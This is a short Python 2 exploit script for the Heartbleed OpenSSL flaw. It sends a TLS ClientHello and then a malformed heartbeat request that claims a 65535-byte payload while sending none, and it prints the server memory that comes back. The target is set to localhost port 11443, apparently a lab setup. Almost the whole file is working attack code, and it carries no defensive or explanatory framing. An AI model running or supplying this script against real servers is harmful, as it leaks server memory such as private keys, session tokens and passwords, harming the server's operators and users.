import socket import time CLIENT_HELLO = ''' 16 03 02 00 31 # TLS Header 01 00 00 2d # Handshake header 03 02 # ClientHello field: version number (TLS 1.1) 50 0b af bb b7 5a b8 3e f0 ab 9a e3 f3 9c 63 15 33 41 37 ac fd 6c 18 1a 24 60 dc 49 67 c2 fd 96 # ClientHello field: random 00 # ClientHello field: session id 00 04 # ClientHello field: cipher suite length 00 33 c0 11 # ClientHello field: cipher suite(s) 01 # ClientHello field: compression support, length 00 # ClientHello field: compression support, no compression (0) 00 00 # ClientHello field: extension length (0) ''' BAD_HB = ''' 18 # Content type = 18 (Heartbeat message) 03 02 # Version 00 03 # Packet length 01 # Heartbeat message type (1 = request) FF FF # Payload length # There is no actual message, just an empty string ''' def no_comments(p): r = '' next_line = False for line in p.split('\n'): for hexbyte in line.split(' '): if len(hexbyte) == 0 or hexbyte[0] == '#': next_line = True break r += hexbyte.decode('hex') if next_line: continue return r def recvall(s, timeout=3): s.setblocking(0) total_data = [] data = '' begin = time.time() while True: if total_data and time.time() - begin > timeout: break elif time.time() - begin > timeout * 2: break try: data = s.recv(8192) if data: total_data.append(data) begin = time.time() else: time.sleep(0.1) except: pass return ''.join(total_data) def attack(host, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(no_comments(CLIENT_HELLO)) recvall(s) s.send(no_comments(BAD_HB)) print recvall(s) attack('127.0.0.1', 11443)